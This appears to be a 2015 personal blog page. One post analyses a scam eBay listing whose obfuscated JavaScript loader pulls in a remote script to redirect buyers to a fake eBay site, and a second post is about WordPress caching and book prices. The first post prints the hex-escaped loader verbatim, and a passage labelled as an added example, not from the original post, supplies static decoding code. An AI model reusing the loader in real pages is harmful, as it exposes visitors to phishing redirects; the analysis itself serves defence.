Wednesday 18 March 2015

eBay still allowing redirecting js in listings

Today I came across another ebay listing that redirects you to a fake ebay site, so it seems eBay still haven't fixed this problem. (Or they fixed it but the scammers have found another alternative). I guess that eBay allow js in auction listings because some sellers like to use auction widgets to show off their other items. It would be much safer if eBay just had their own widget people could use and didn't allow users to input js.

The hack looks like this: as part of the item description they include the following script:

<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D","\x68\x74\x74","\x70\x3A\x2F\x2F","\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73","\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27","\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>

Basically the script adds another script tag to the page, and that second script, loaded from the scammer's own domain, does the redirection. The text that makes up the injected script tag is split into pieces, and every character of those pieces is written as a JavaScript hex string escape (\xHH) rather than as plain text, so strings like SCRIPT, write and the remote URL never appear literally in the listing HTML and a simple keyword filter looking for "<script src=" or the domain name will not match. Because the pieces are only joined together at runtime and passed to document.write, the remote script is inserted and run as soon as the description is rendered. If you look at the _0x2786 array, it looks like this:
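To make the decoding concrete, here is an added example (my own analysis code, not anything from the original post, the listing, or eBay). It takes the loader text above as a string, decodes the \xHH escapes statically without ever executing the script, replays the two document.write calls against a recording stub, and reports the remote script URL that would be injected. The _0x... array naming it searches for, the replay order (which follows this specific sample), and the analyseLoader helper are assumptions of this example rather than part of the listing's code.

```javascript
// Added example (not code from the original post): statically analyse the
// obfuscated loader without executing it.

// The loader as it appears in the listing HTML. String.raw keeps the
// backslashes literal, so this is the text an analyst sees in page source,
// not already-decoded strings. Line breaks inside the array are added for
// readability only.
const RAW_LOADER = String.raw`<script> var _0x2786=["\x53\x43","\x52\x49","\x50\x54","\x53\x52","\x43\x3D",
"\x68\x74\x74","\x70\x3A\x2F\x2F",
"\x6C\x6F\x73\x73\x65\x72\x74\x69\x6D\x65\x2E\x63\x6F\x6D\x2F\x78\x69\x78\x6B\x6D\x73\x6E\x65\x2E\x6A\x73",
"\x3C","\x20\x74\x79\x70\x65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27",
"\x3E","\x77\x72\x69\x74\x65","\x3C\x2F"];var ya=_0x2786[0];var yb=_0x2786[1];var yc=_0x2786[2];var yd=_0x2786[3];var ye=_0x2786[4];var yf=_0x2786[5];var yg=_0x2786[6];var fy0=_0x2786[7];document[_0x2786[11]](_0x2786[8]+ya+yb+yc+_0x2786[9]+yd+ye+yf+yg+fy0+_0x2786[10]);document[_0x2786[11]](_0x2786[12]+ya+yb+yc+_0x2786[10]); </script>`;

// Decode JavaScript \xHH escapes. This is the trick the post describes: every
// character of the payload is written as a two-digit hex escape, so "SCRIPT",
// "write" and the remote URL never appear literally in the listing.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) =>
    String.fromCharCode(parseInt(hh, 16)));
}

// Count hex escapes; dozens of them inside a <script> in a listing are a
// cheap red flag a sanitiser can act on even before decoding anything.
function countHexEscapes(text) {
  return (text.match(/\\x[0-9a-fA-F]{2}/g) || []).length;
}

// Locate the obfuscator's string array (assumed here to use the _0x... naming
// seen in this sample) and parse it as data instead of running it.
function extractStringArray(source) {
  const m = source.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*(\[[^\]]*\])/);
  if (!m) return null;
  return { name: m[1], parts: JSON.parse(decodeHexEscapes(m[2])) };
}

// Replay the loader's two document.write calls against a recording stub,
// using the same slot layout and concatenation order as this sample:
// parts[8] + ya + yb + yc + parts[9] + yd + ye + yf + yg + fy0 + parts[10].
function replayWrites(parts) {
  const written = [];
  const doc = { write: (s) => written.push(s) };
  if (typeof doc[parts[11]] !== "function") {
    throw new Error("unexpected array layout: slot 11 is not a document method");
  }
  const [ya, yb, yc, yd, ye, yf, yg, fy0] = parts;
  doc[parts[11]](parts[8] + ya + yb + yc + parts[9] + yd + ye + yf + yg + fy0 + parts[10]);
  doc[parts[11]](parts[12] + ya + yb + yc + parts[10]);
  return written.join("");
}

// Pull external script sources out of markup. Handles quoted and unquoted
// src values; the loader emits an unquoted one with no space before SRC.
function externalScriptSources(html) {
  const re = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Full analysis, returned as data so a listing scanner can log or block it.
function analyseLoader(source) {
  const arr = extractStringArray(source);
  if (!arr) return null;
  const injectedMarkup = replayWrites(arr.parts);
  return {
    arrayName: arr.name,
    parts: arr.parts,
    hexEscapeCount: countHexEscapes(source),
    injectedMarkup,
    scriptSources: externalScriptSources(injectedMarkup),
  };
}

console.log(JSON.stringify(analyseLoader(RAW_LOADER), null, 2));
```

Running this shows the array decoding to plain fragments ("SC", "RI", "PT", "SR", "C=", "htt", "p://", the hostname and path, "<", " type='text/javascript'", ">", "write", "</") and the two writes assembling an opening SCRIPT tag with an unquoted SRC pointing at the remote file plus a closing tag. Nothing here contacts the remote host; the point is that the URL can be recovered and blocked from the listing text alone. The hex-escape count is only a heuristic; the real fix is the one the post suggests, which is not accepting seller-supplied script at all.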

Wednesday 4 March 2015

Good books are too expensive

I spent most of this morning trying to get one of my wordpress plugins to work with the wp super cache plugin without late init enabled. I got quite far, then realised that my plugin actually needs to call the database for one of its methods, and so wouldn't work without late init. So most of my work this morning was just scrapped.

In the afternoon I noticed a book on eBay called Great Stalinist Photographic Books - RODCHENKO, EL LISSITZKY - Rare, Brand New, which was selling for £200! I checked Amazon, and it was a similar price on there too. However, doing a bit more checking it seems it can be had cheaper (though still expensively) - $70.90 + $3.99 shipping new from Amazon Marketplace (a different entry for the book where it is titled Paradnaja kniga Strany Sovetov. 2007 / Great Stalinist Photographic Books (Fotoiskusstvo) (Hardcover)). Or from Ozonru, where it is selling for £41.40.

I contacted another website that had the book listed and had a price, but didn't seem to have any way to buy online. So I'll see if it can be had cheaper from there. Likely they don't have it in stock, don't ship to the UK, or want the payment through WebMoney (which is not available in the UK).